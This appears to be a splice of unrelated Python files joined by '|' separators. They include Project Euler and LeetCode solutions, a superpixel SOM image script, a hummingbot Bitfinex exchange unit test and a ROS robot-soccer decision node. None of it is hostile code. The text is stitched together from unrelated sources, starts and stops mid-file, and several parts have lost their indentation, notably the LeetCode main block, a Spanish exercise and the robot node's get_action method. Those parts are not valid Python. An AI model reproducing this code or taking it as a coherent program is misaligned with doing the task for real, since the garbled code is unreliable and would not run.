# Attach the plugin and open the interactive figure in the browser.
plugins.connect(fig, ilp)
#mpld3.display()
mpld3.show()
|
from math import sqrt
def isPrime(x):
    """Return True iff x is a prime number.

    Robustness fix: the original returned True for 0 and crashed on
    negative input (sqrt of a negative); all x < 2 now return False.
    Trial division only needs to reach floor(sqrt(x)); even numbers
    are rejected up front so only odd divisors are tried.
    """
    if x < 2:
        return False
    if x == 2:
        return True
    if x % 2 == 0:
        return False
    # +1 slack guards against floating-point sqrt rounding down.
    root = int(sqrt(x)) + 1
    for i in range(3, root + 1, 2):
        if x % i == 0:
            return False
    return True
def numPrimeDivisors(num):
    """Return the number of DISTINCT prime factors of num.

    Examples: numPrimeDivisors(1) == 0, numPrimeDivisors(12) == 2.

    Replaces the original recursive version whose trial division ran
    all the way to num // 2 (plus a redundant isPrime check): dividing
    each found factor out and stopping at sqrt(num) gives the same
    results in O(sqrt(num)).
    """
    count = 0
    d = 2
    while d * d <= num:
        if num % d == 0:
            count += 1
            while num % d == 0:
                num //= d
        d += 1
    if num > 1:
        # Whatever remains is a single prime larger than sqrt(original).
        count += 1
    return count
# Project Euler 47: find the first of four consecutive integers that
# each have exactly four distinct prime factors.  `d` memoises
# numPrimeDivisors for the sliding window.
i = 5
d = {k: numPrimeDivisors(k) for k in range(i, i + 4)}
while [d[j] for j in range(i, i + 4)] != [4, 4, 4, 4]:
    d[i + 4] = numPrimeDivisors(i + 4)
    i += 1
print(i)
|
from skimage import data, segmentation, color, io, exposure
from minisom import MiniSom
import numpy as np
import argparse
# get color histogram of each superpixel, no normalized
def get_color_histogram(image, superpixels, index):
    """Per-channel 256-bin colour histogram of one superpixel (not normalised).

    image: (H, W, 3) integer RGB image; superpixels: (H, W) label map
    with the same H x W layout; index: the superpixel label to select.
    Returns a (r_hist, g_hist, b_hist) tuple of count arrays.
    """
    member_mask = np.where(superpixels.ravel() == index)[0]
    channels = (image[:, :, c].ravel()[member_mask] for c in range(3))
    return tuple(np.bincount(ch, minlength=256) for ch in channels)
# get grayscale histogram of each superpixel, not normalized
def get_grayscale_histogram(image, superpixels, index):
    """256-bin intensity histogram of one superpixel (not normalised).

    Assumes *image* is a single-channel integer image with the same
    H x W layout as the *superpixels* label map.
    """
    flat = image[:, :].ravel()
    members = np.where(superpixels.ravel() == index)[0]
    return np.bincount(flat[members], minlength=256)
# Segment an image into superpixels, build a per-superpixel grayscale
# histogram matrix, and train a 5x5 SOM on those histograms.
parser = argparse.ArgumentParser()
parser.add_argument('input_image', type=str, help='input image path')
parser.add_argument('num_superpixel', type=int, help='number of segments')
parser.add_argument('compactness', type=int, help='compactness param of SLIC')
args = parser.parse_args()
# The CLI image path is currently ignored; the skimage sample is used.
img = data.coffee()
#img = io.imread(args.input_image)
labels = segmentation.slic(img, n_segments=args.num_superpixel, compactness=args.compactness)
out1 = color.label2rgb(labels, img, kind='avg')
#print(labels.shape)
#print(np.unique(labels))
io.imshow(out1)
io.show()
out1_gray = color.rgb2gray(out1)
io.imshow(out1_gray)
io.show()
# NOTE(review): labels run 0..max, so there are np.max(labels)+1
# superpixels — this allocation (and the loop below) skips the last
# one; probably should be np.max(labels) + 1.  TODO confirm.
hist = np.zeros((np.max(labels), 256), dtype=float)
#print(hist.shape)
for i in range(np.max(labels)):
    # NOTE(review): `img` is RGB here, so image[:, :].ravel() inside
    # get_grayscale_histogram has 3*H*W entries while the indices come
    # from the H*W label map — presumably a uint8 grayscale image
    # (e.g. out1_gray scaled to 0..255) was intended.  TODO confirm.
    gray_hist = get_grayscale_histogram(img, labels, i)
    gray_hist = np.float32(gray_hist / gray_hist.sum())
    hist[i, :] = gray_hist
print(hist.shape)
'''
for i in range(np.max(labels)):
    r_hist, g_hist, b_hist = get_color_histogram(img, labels, i)
    hist[i][0] = r_hist
    hist[i][1] = g_hist
    hist[i][2] = b_hist
    #hist[i][0], hist[i][1], hist[i][2] = get_color_histogram(img, labels, i)
'''
print('training...')
# 5x5 map, one 256-dim weight vector (a histogram) per node.
som = MiniSom(5, 5, 256, sigma=0.5, learning_rate=0.2, neighborhood_function='gaussian')
som.random_weights_init(hist)
starting_weights = som.get_weights().copy() # saving the starting weights
som.train_random(hist, 1000, verbose=True)
#print('quantization...')
#qnt = som.quantization(hist) # quantize each pixels of the image
#print('building new image...')
print('done.')
print(starting_weights.shape)
# Show the SOM weights before and after training for comparison.
io.imshow(starting_weights)
io.show()
io.imshow(som.get_weights())
io.show()
|
# https://swexpertacademy.com/main/code/problem/problemDetail.do?contestProbId=AV_XEokaAEcDFAX7&
# Binary search.
# Given a candidate time limit, we can count how many people get through within it.
def solution(n, times):
    """Minimum total time for n people to pass through the gates.

    Binary-search the answer: with a candidate time t, the number of
    people processed is sum(t // gate_time for every gate), which is
    monotonically non-decreasing in t.
    """
    lo, hi = 1, n * max(times) + 1
    while lo < hi:
        mid = (lo + hi) // 2
        processed = sum(mid // gate for gate in times)
        if processed < n:
            lo = mid + 1        # too slow: need more time
        else:
            hi = mid            # feasible: try to shrink
    return lo
# Read T test cases: N gate times and M people, then print "#<case> <answer>".
for case_no in range(int(input())):
    gate_count, people = map(int, input().split())
    gate_times = [int(input()) for _ in range(gate_count)]
    print('#%d %d' % (case_no + 1, solution(people, gate_times)))
|
#-*- coding:utf-8 -*-
# leetcode 25
class ListNode(object):
    """Singly linked list node with a debugging helper."""

    def __init__(self, x):
        self.val = x
        self.next = None

    def to_list(self):
        """Return the values from this node to the tail as a Python list."""
        values = []
        node = self
        while node is not None:
            values.append(node.val)
            node = node.next
        return values
class Solution(object):
    """LeetCode 25: reverse nodes of a linked list in k-sized groups."""

    def reverseKGroup(self, head, k):
        """Reverse the VALUES of each full k-sized group in place.

        The node objects themselves are never relinked; values are read
        ahead in groups of k and written back reversed.  A trailing
        partial group (fewer than k nodes) is left untouched, and the
        original head is always returned.
        """
        writer = head   # next node whose value will be overwritten
        reader = head   # start of the group currently being collected
        while reader:
            # Collect up to k values starting at `reader`.
            vals = []
            probe = reader
            while probe and len(vals) < k:
                vals.append(probe.val)
                probe = probe.next
            if len(vals) < k:
                # Partial final group: leave it as-is.
                return head
            # Write the collected values back in reverse order.
            for v in reversed(vals):
                writer.val = v
                writer = writer.next
            reader = probe
        return head
if __name__ == "__main__":
n1 = ListNode(1)
n2 = ListNode(4)
n3 = ListNode(5)
n4 = ListNode(2)
n5 = ListNode(3)
n6 = ListNode(6)
n1.next = n2
n2.next = n3
n3.next = n4
n4.next = n5
n5.next = n6
print n1.to_list()
r = Solution().reverseKGroup(n1, 2)
print r.to_list()
|
#!/usr/bin/python3
"""
PE005: Smallest multiple
2520 is the smallest number that can be divided by each of the numbers
from 1 to 10 without any remainder.
What is the smallest positive number that is evenly divisible by
all of the numbers from 1 to 20?
"""
import functools
from .utils import lcm
def main(n=20):
    """Return the smallest positive integer evenly divisible by all of
    1..n (inclusive).

    Bug fix: the original reduced over ``range(1, 20)``, ignoring *n*
    entirely.  That happened to give the right answer for the default
    n=20 (16 and 5 already contribute all of 20's prime factors) but
    was wrong for every other argument.  The initializer 1 also makes
    n < 1 well-defined instead of raising on an empty range.
    """
    return functools.reduce(lcm, range(1, n + 1), 1)
|
"""
Ejercicio 3: programa que compruebe si una variable está vacía.
Y si está vacía rellenarla con texto en minúscula y mostrarlo en mayúsculas.
"""
# comprobar variable
texto = ""
if len(texto.strip()) <= 0:
print("La variable está vacía")
else:
print("La variable tiene contenido", len(texto))
variable_vacia = "piletazo"
if len(texto) <= 0:
print(variable_vacia)
print(variable_vacia.upper())
|
import asyncio
from decimal import Decimal
from typing import Awaitable, Optional
from unittest import TestCase
from hummingbot.client.config.client_config_map import ClientConfigMap
from hummingbot.client.config.config_helpers import ClientConfigAdapter
from hummingbot.connector.exchange.bitfinex.bitfinex_exchange import BitfinexExchange
from hummingbot.core.data_type.common import OrderType, TradeType
from hummingbot.core.data_type.trade_fee import TokenAmount
from hummingbot.core.event.event_logger import EventLogger
from hummingbot.core.event.events import MarketEvent, OrderFilledEvent
class BitfinexExchangeTests(TestCase):
    """Unit tests for BitfinexExchange trade-event processing.

    The test case registers ITSELF as a logging handler on the
    connector's logger (see handle()) so assertions can be made about
    emitted log records, and attaches EventLogger listeners to capture
    market events raised by the connector.
    """
    # the level is required to receive logs from the data source logger
    level = 0
    @classmethod
    def setUpClass(cls) -> None:
        super().setUpClass()
        cls.base_asset = "COINALPHA"
        cls.quote_asset = "HBOT"
        cls.trading_pair = f"{cls.base_asset}-{cls.quote_asset}"
        cls.symbol = f"{cls.base_asset}{cls.quote_asset}"
        cls.listen_key = "TEST_LISTEN_KEY"
    def setUp(self) -> None:
        super().setUp()
        self.log_records = []
        self.test_task: Optional[asyncio.Task] = None
        self.client_config_map = ClientConfigAdapter(ClientConfigMap())
        # Connector built with dummy credentials; no network calls are
        # made in these tests — events are injected directly.
        self.exchange = BitfinexExchange(
            client_config_map=self.client_config_map,
            bitfinex_api_key="testAPIKey",
            bitfinex_secret_key="testSecret",
            trading_pairs=[self.trading_pair],
        )
        # Route every log record from the connector into self.log_records.
        self.exchange.logger().setLevel(1)
        self.exchange.logger().addHandler(self)
        self._initialize_event_loggers()
    def tearDown(self) -> None:
        # Cancel any helper task a test may have started.
        self.test_task and self.test_task.cancel()
        super().tearDown()
    def _initialize_event_loggers(self):
        """Attach EventLogger listeners for the market events under test."""
        self.buy_order_completed_logger = EventLogger()
        self.sell_order_completed_logger = EventLogger()
        self.order_filled_logger = EventLogger()
        events_and_loggers = [
            (MarketEvent.BuyOrderCompleted, self.buy_order_completed_logger),
            (MarketEvent.SellOrderCompleted, self.sell_order_completed_logger),
            (MarketEvent.OrderFilled, self.order_filled_logger)]
        for event, logger in events_and_loggers:
            self.exchange.add_listener(event, logger)
    def handle(self, record):
        # logging.Handler protocol: collect records for _is_logged().
        self.log_records.append(record)
    def _is_logged(self, log_level: str, message: str) -> bool:
        """True if a record with the given level and exact message was logged."""
        return any(record.levelname == log_level and record.getMessage() == message for record in self.log_records)
    def async_run_with_timeout(self, coroutine: Awaitable, timeout: float = 1):
        """Run *coroutine* on the event loop, failing the test after *timeout* s."""
        ret = asyncio.get_event_loop().run_until_complete(asyncio.wait_for(coroutine, timeout))
        return ret
    def test_order_fill_event_takes_fee_from_update_event(self):
        """Two partial fills: fees accumulate and each fill event carries
        the fee amount/currency reported by the exchange message."""
        self.exchange.start_tracking_order(
            order_id="OID1",
            trading_pair=self.trading_pair,
            order_type=OrderType.LIMIT,
            trade_type=TradeType.BUY,
            price=Decimal("10000"),
            amount=Decimal("1"),
        )
        order = self.exchange.in_flight_orders.get("OID1")
        order.update_exchange_order_id("34938060782")
        # Simulated Bitfinex "tu" (trade update) websocket payload;
        # field meanings are given inline.
        partial_fill = [
            0,  # CHAN_ID
            "tu",  # TYPE
            [
                1,  # ID
                f"t{self.trading_pair}",  # SYMBOL
                1574963975602,  # MTS_CREATE
                34938060782,  # ORDER_ID
                0.1,  # EXEC_AMOUNT
                10053.57,  # EXEC_PRICE
                "LIMIT",  # ORDER_TYPE
                0,  # ORDER_PRICE
                -1,  # MAKER
                10.0,  # FEE
                "USDT",  # FEE_CURRENCY
                0  # CID
            ]
        ]
        self.exchange._process_trade_event(event_message=partial_fill)
        # Fee asset/amount must come straight from the event payload.
        self.assertEqual(partial_fill[2][10], order.fee_asset)
        self.assertEqual(Decimal(str(partial_fill[2][9])), order.fee_paid)
        self.assertEqual(1, len(self.order_filled_logger.event_log))
        fill_event: OrderFilledEvent = self.order_filled_logger.event_log[0]
        self.assertEqual(Decimal("0"), fill_event.trade_fee.percent)
        self.assertEqual(
            [TokenAmount(partial_fill[2][10], Decimal(str(partial_fill[2][9])))], fill_event.trade_fee.flat_fees
        )
        self.assertTrue(self._is_logged(
            "INFO",
            f"Order filled {Decimal(str(partial_fill[2][4]))} out of {order.amount} of the "
            f"{order.order_type_description} order {order.client_order_id}"
        ))
        # Order is only partially filled — no completion event yet.
        self.assertEqual(0, len(self.buy_order_completed_logger.event_log))
        # Second fill for the remaining 0.9 completes the order.
        complete_fill = [
            0,  # CHAN_ID
            "tu",  # TYPE
            [
                2,  # ID
                f"t{self.trading_pair}",  # SYMBOL
                1574963975602,  # MTS_CREATE
                34938060782,  # ORDER_ID
                0.9,  # EXEC_AMOUNT
                10060.0,  # EXEC_PRICE
                "LIMIT",  # ORDER_TYPE
                0,  # ORDER_PRICE
                -1,  # MAKER
                20.0,  # FEE
                "USDT",  # FEE_CURRENCY
                0  # CID
            ]
        ]
        self.exchange._process_trade_event(event_message=complete_fill)
        self.assertEqual(complete_fill[2][10], order.fee_asset)
        # Fees accumulate across fills: 10 + 20.
        self.assertEqual(Decimal(30), order.fee_paid)
        self.assertEqual(2, len(self.order_filled_logger.event_log))
        fill_event: OrderFilledEvent = self.order_filled_logger.event_log[1]
        self.assertEqual(Decimal("0"), fill_event.trade_fee.percent)
        self.assertEqual([TokenAmount(complete_fill[2][10], Decimal(complete_fill[2][9]))],
                         fill_event.trade_fee.flat_fees)
        self.assertTrue(self._is_logged(
            "INFO",
            f"The market {order.trade_type.name.lower()} "
            f"order {order.client_order_id} has completed "
            "according to Bitfinex user stream."
        ))
        self.assertEqual(1, len(self.buy_order_completed_logger.event_log))
|
#!/usr/bin/env python2
# coding: UTF-8
import rospy
import math
from consai2_msgs.msg import VisionGeometry
from consai2_msgs.msg import BallInfo, RobotInfo
from consai2_msgs.msg import DecodedReferee
from consai2_msgs.msg import ControlTarget
from geometry_msgs.msg import Pose2D
import referee_wrapper as ref
import avoidance
from actions import tool, offense, goalie, normal, ball_placement
from field import Field
from observer import Observer
import role
import assign
class RobotNode(object):
    def __init__(self, robot_id):
        """Per-robot decision node.

        Holds the ControlTarget message that is (re)filled each cycle
        by get_action()/get_sleep() and published for this robot.
        """
        self._MY_ID = robot_id
        self._control_target = ControlTarget()
        self._control_target.robot_id = robot_id
        # Start disabled until a referee state allows movement.
        self._control_target.control_enable = False
        self._my_pose = Pose2D()
        self._my_velocity = Pose2D()
        self._is_attacker = False
        self._is_goalie = False
        # 0 is goalie, 1 is attacker, 2~7 is defense
        self._my_role = 1
    def set_state(self, pose, velocity):
        """Cache the latest observed pose and velocity (Pose2D) of this robot."""
        self._my_pose = pose
        self._my_velocity = velocity
    def set_goalie(self):
        """Mark this robot as the goalie (used by role-based behaviour)."""
        self._is_goalie = True
    def get_sleep(self):
        """Return this robot's ControlTarget with control disabled."""
        # Disable control so the robot halts.
        self._control_target.control_enable = False
        return self._control_target
def get_action(self, referee, obstacle_avoidance, ball_info, robot_info=None, defense_num=0):
self._control_target.control_enable = True
remake_path = False # 経路再生成のフラグ TODO:remake_pathを活用する
avoid_obstacle = True # 障害物回避の経路追加フラグ
avoid_ball = False # ボール回避の経路追加フラグ
zone_enable = False
# パラメータ初期化
self._control_target.dribble_power = 0.0
self._control_target.kick_power = 0.0
if referee.can_move_robot is False or ball_info.disappeared:
# 移動禁止 or ボールの消失で制御を停止する
rospy.logdebug("HALT")
self._control_target, remake_path= normal.stop(self._control_target)
avoid_obstacle = False # 障害物回避しない
elif referee.is_inplay:
rospy.logdebug("IN-PLAY")
zone_enable = True
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
if tool.is_in_defense_area(ball_info.pose, 'our'):
self._control_target = offense.outside_shoot(
self._my_pose, ball_info, self._control_target)
else:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
if tool.is_in_defense_area(ball_info.pose, 'our'):
# ボールが自チームのディフェンスエリアにある場合は行動を変える
self._control_target = normal.move_to(
self._control_target, Pose2D(0,0,0), ball_info, look_ball=True)
elif tool.is_in_defense_area(ball_info.pose, 'their'):
# ボールが相手チームのディフェンスエリアにある場合は行動を変える
self._control_target = normal.keep_x(
self._control_target,
Field.penalty_pose('their', 'upper_front').x - 1.0,
ball_info)
else:
self._control_target = offense.inplay_shoot(
self._my_pose, ball_info, self._control_target)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info, zone_enable)
else:
if referee.referee_id == ref.REFEREE_ID["STOP"]:
rospy.logdebug("STOP")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target = offense.interpose(ball_info,
self._control_target, dist_from_target=0.7)
avoid_ball = True
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_KICKOFF_PREPARATION"]:
rospy.logdebug("OUR_KICKOFF_PREPARATION")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = offense.setplay_shoot(
self._my_pose, ball_info, self._control_target,
kick_enable=False)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_KICKOFF_START"]:
rospy.logdebug("OUR_KICKOFF_START")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = offense.setplay_shoot(
self._my_pose, ball_info, self._control_target,
kick_enable=True)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_PENALTY_PREPARATION"]:
rospy.logdebug("OUR_PENALTY_PREPARATION")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = offense.setplay_shoot(
self._my_pose, ball_info, self._control_target,
kick_enable=False)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_PENALTY_START"]:
rospy.logdebug("OUR_PENALTY_START")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = offense.setplay_shoot(
self._my_pose, ball_info, self._control_target,
kick_enable=True, penalty=True)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_DIRECT_FREE"]:
rospy.logdebug("OUR_DIRECT_FREE")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = offense.setplay_pass(
self._my_pose, ball_info, self._control_target,
Pose2D(Field.field('length')*0.25, 0, 0),
receive_enable=True, receiver_role_exist=Observer.role_is_exist(role.ROLE_ID["ROLE_ZONE_1"]),
robot_info=robot_info, direct=True)
elif self._my_role == role.ROLE_ID["ROLE_ZONE_1"]:
self._control_target = normal.move_to(
self._control_target, Pose2D(Field.field('length')*0.25,0,0), ball_info, look_ball=True)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_INDIRECT_FREE"]:
rospy.logdebug("OUR_INDIRECT_FREE")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = offense.setplay_pass(
self._my_pose, ball_info, self._control_target,
Pose2D(Field.field('length')*0.25, 0, 0),
receive_enable=True, receiver_role_exist=Observer.role_is_exist(role.ROLE_ID["ROLE_ZONE_1"]),
robot_info=robot_info)
elif self._my_role == role.ROLE_ID["ROLE_ZONE_1"]:
self._control_target = normal.move_to(
self._control_target, Pose2D(Field.field('length')*0.25,0,0), ball_info, look_ball=True)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_TIMEOUT"]:
rospy.logdebug("OUR_TIMEOUT")
# 自チームのタイムアウトではロボットを停止させる
self._control_target, remake_path= normal.stop(self._control_target)
avoid_obstacle = False # 障害物回避しない
elif referee.referee_id == ref.REFEREE_ID["OUR_BALL_PLACEMENT"]:
rospy.logdebug("OUR_BALL_PLACEMENT")
replace_pose = referee.placement_position
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = ball_placement.basic_ball_placement(self._control_target, replace_pose, ball_info, robot_info, self._MY_ID, 'atk', [Field.field('length'), Field.field('width')])
elif self._my_role == role.ROLE_ID["ROLE_CENTER_BACK_1"]:
self._control_target, avoid_ball = ball_placement.basic_ball_placement(self._control_target, replace_pose, ball_info, robot_info, self._MY_ID, 'recv', [Field.field('length'), Field.field('width')])
else:
self._control_target, avoid_ball = ball_placement.avoid_ball_place_line(
self._my_pose, ball_info, replace_pose, self._control_target)
elif referee.referee_id == ref.REFEREE_ID["THEIR_KICKOFF_PREPARATION"] \
or referee.referee_id == ref.REFEREE_ID["THEIR_KICKOFF_START"]:
rospy.logdebug("THEIR_KICKOFF")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target = offense.interpose(ball_info,
self._control_target, dist_from_target=0.6)
avoid_ball = True
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["THEIR_PENALTY_PREPARATION"] \
or referee.referee_id == ref.REFEREE_ID["THEIR_PENALTY_START"]:
rospy.logdebug("THEIR_PENALTY")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
else:
self._control_target, remake_path = normal.make_line(
self._my_role, ball_info, self._control_target,
start_x=-Field.field("length")*0.5,
start_y=Field.field("width")*0.4,
add_x=0.4, add_y=0)
elif referee.referee_id == ref.REFEREE_ID["THEIR_DIRECT_FREE"]:
rospy.logdebug("THEIR_DIRECT")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target = offense.interpose(ball_info,
self._control_target, dist_from_target=0.6)
avoid_ball = True
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info,zone_enable=True)
elif referee.referee_id == ref.REFEREE_ID["THEIR_INDIRECT_FREE"]:
rospy.logdebug("THEIR_INDIRECT")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target = offense.interpose(ball_info,
self._control_target, dist_from_target=0.6)
avoid_ball = True
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info, zone_enable=True)
elif referee.referee_id == ref.REFEREE_ID["THEIR_TIMEOUT"]:
rospy.logdebug("THEIR_TIMEOUT")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target = offense.interpose(ball_info,
self._control_target, dist_from_target=0.6)
avoid_ball = True
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["THEIR_BALL_PLACEMENT"]:
rospy.logdebug("THEIR_BALL_PLACEMENT")
replace_pose = referee.placement_position
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
# elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
# self._control_target = offense.interpose(ball_info,
# self._control_target, dist_from_target=0.6)
# avoid_ball = True
else:
self._control_target, avoid_ball = ball_placement.avoid_ball_place_line(
self._my_pose, ball_info, replace_pose, self._control_target,
force_avoid=True)
# self._control_target = assign.assign(
# self._my_role, ball_info, self._control_target,
# self._my_pose, defense_num, robot_info)
# 障害物回避の経路作成
if avoid_obstacle:
self._control_target.path = obstacle_avoidance.add_path(
self._control_target.path, self._my_pose, avoid_ball)
return self._control_target
class Game(object):
    """Top-level game node: wires vision/referee ROS topics to per-robot
    RobotNode instances and publishes one ControlTarget per robot.
    """
    def __init__(self):
        QUEUE_SIZE = 1
        self._FAR_DISTANCE = 1e+10
        # Team configuration comes from ROS parameters with defaults.
        self._OUR_COLOR = rospy.get_param('consai2_description/our_color', 'blue')
        self._MAX_ID = rospy.get_param('consai2_description/max_id', 15)
        self._GOALIE_ID = rospy.get_param('consai2_description/goalie_id', 0)
        self._THEIR_COLOR = 'yellow'
        if self._OUR_COLOR == 'yellow':
            self._THEIR_COLOR = 'blue'
        self._robot_node = []
        for robot_id in range(self._MAX_ID + 1):
            self._robot_node.append(RobotNode(robot_id))
            # Assign the goalie.
            # The goalie is chosen only at consai2 startup and never changed afterwards.
            if robot_id == self._GOALIE_ID:
                self._robot_node[robot_id].set_goalie()
        self._roledecision = role.RoleDecision(self._MAX_ID, self._GOALIE_ID)
        self._sub_geometry = rospy.Subscriber(
            'vision_receiver/raw_vision_geometry', VisionGeometry,
            self._callback_geometry, queue_size=1)
        self._decoded_referee = DecodedReferee()
        self._sub_decoded_referee = rospy.Subscriber(
            'referee_wrapper/decoded_referee', DecodedReferee,
            self._callback_referee, queue_size=1)
        self._ball_info = BallInfo()
        self._sub_ball_info = rospy.Subscriber(
            'vision_wrapper/ball_info', BallInfo,
            self._callback_ball_info, queue_size=1)
        self._robot_info = {'our':[],'their':[]}
        self._subs_robot_info = {'our':[],'their':[]}
        self._pubs_control_target = []
        for robot_id in range(self._MAX_ID + 1):
            # Topic names end with the robot id in hexadecimal.
            topic_id = hex(robot_id)[2:]
            self._robot_info['our'].append(RobotInfo())
            self._robot_info['their'].append(RobotInfo())
            topic_name = 'vision_wrapper/robot_info_' + self._OUR_COLOR + '_' + topic_id
            sub_robot_info = rospy.Subscriber(topic_name, RobotInfo,
                    self._callback_our_info, queue_size=QUEUE_SIZE,
                    callback_args=robot_id)
            self._subs_robot_info['our'].append(sub_robot_info)
            topic_name = 'vision_wrapper/robot_info_' + self._THEIR_COLOR + '_' + topic_id
            sub_robot_info = rospy.Subscriber(topic_name, RobotInfo,
                    self._callback_their_info, queue_size=QUEUE_SIZE,
                    callback_args=robot_id)
            self._subs_robot_info['their'].append(sub_robot_info)
            topic_name = 'consai2_game/control_target_' + self._OUR_COLOR+'_' + topic_id
            pub_control_target = rospy.Publisher(topic_name, ControlTarget,
                    queue_size=1)
            self._pubs_control_target.append(pub_control_target)
        # Helper class for obstacle-avoidance path generation.
        self._obstacle_avoidance = avoidance.ObstacleAvoidance()
    def _callback_geometry(self, msg):
        """Store the latest field geometry in the shared Field class."""
        Field.update(msg)
    def _callback_referee(self, msg):
        """Cache the most recent decoded referee message."""
        self._decoded_referee = msg
    def _callback_ball_info(self, msg):
        """Cache the most recent ball observation."""
        self._ball_info = msg
    def _callback_our_info(self, msg, robot_id):
        """Cache our robot *robot_id*'s latest observation."""
        self._robot_info['our'][robot_id] = msg
    def _callback_their_info(self, msg, robot_id):
        """Cache opponent robot *robot_id*'s latest observation."""
        self._robot_info['their'][robot_id] = msg
    def update(self):
        """Run one control cycle: refresh observers, decide roles, publish targets."""
        Observer.update_ball_is_moving(self._ball_info)
        Observer.update_role_is_exist(self._roledecision._rolestocker._role_is_exist)
        self._roledecision.set_disappeared([i.disappeared for i in self._robot_info['our']])
        if tool.is_in_defense_area(self._ball_info.pose, 'our') is False \
                and Observer.ball_is_moving() is False:
            # While the ball is outside our defense area and not moving,
            # consider swapping which robot plays the attacker role.
            self._roledecision.check_ball_dist([i.pose for i in self._robot_info['our']], self._ball_info)
        self._roledecision.event_observer()
        defense_num = self._roledecision._rolestocker._defense_num
        self._obstacle_avoidance.update_obstacles(self._ball_info, self._robot_info)
        for our_info in self._robot_info['our']:
            robot_id = our_info.robot_id
            target = ControlTarget()
            # Refresh this robot's assigned role.
            self._robot_node[robot_id]._my_role = self._roledecision._rolestocker._my_role[robot_id]
            if our_info.disappeared:
                # Robot is not visible to vision: command it to stop.
                target = self._robot_node[robot_id].get_sleep()
            else:
                # Update the robot's pose/velocity state.
                self._robot_node[robot_id].set_state(
                    our_info.pose, our_info.velocity)
